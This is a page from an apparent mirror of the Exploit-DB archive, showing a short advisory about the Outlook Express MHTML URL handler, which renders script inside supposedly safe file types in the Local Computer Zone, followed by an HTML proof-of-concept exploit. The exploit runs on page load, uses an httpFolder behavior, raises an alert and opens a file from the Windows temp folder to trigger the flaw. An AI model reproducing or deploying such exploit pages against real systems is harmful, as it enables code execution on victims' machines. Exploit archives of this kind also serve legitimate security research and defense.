bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/21711.html
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
966 B
HTML
Raw Blame History

source: https://www.securityfocus.com/bid/5473/info
Microsoft Outlook Express introduced a URL handler called MHTML (MIME Encapsulation of Aggregate HTML). This allows Internet Explorer to pass MHTML files to Outlook Express for rendering.
The MHTML URL handler does not validate the file type it is rendering. This could allow a file type that is normally considered to be a "safe file type", such as a .txt file, to be opened and have any script contained within rendered. This script would then be rendered in the Local Computer Zone.
<html>
<head>
<title>malware.com</title>
<meta NAME="Author" CONTENT="malware.com">
<meta name="robots" content="noindex, nofollow">
</head>
<body onload=malware() style="behavior: url(#default#httpFolder);">
<script>
function malware(){
document.body.navigate("http://www.microsoft.com");alert("malware");
open("file://C%3A%5CWINDOWS%5CTemp%5Cwecerr.txt")
}
</script><br><br><br><br>
<center><image src="smile.gif"></center>
Reference in a new issue View git blame Copy permalink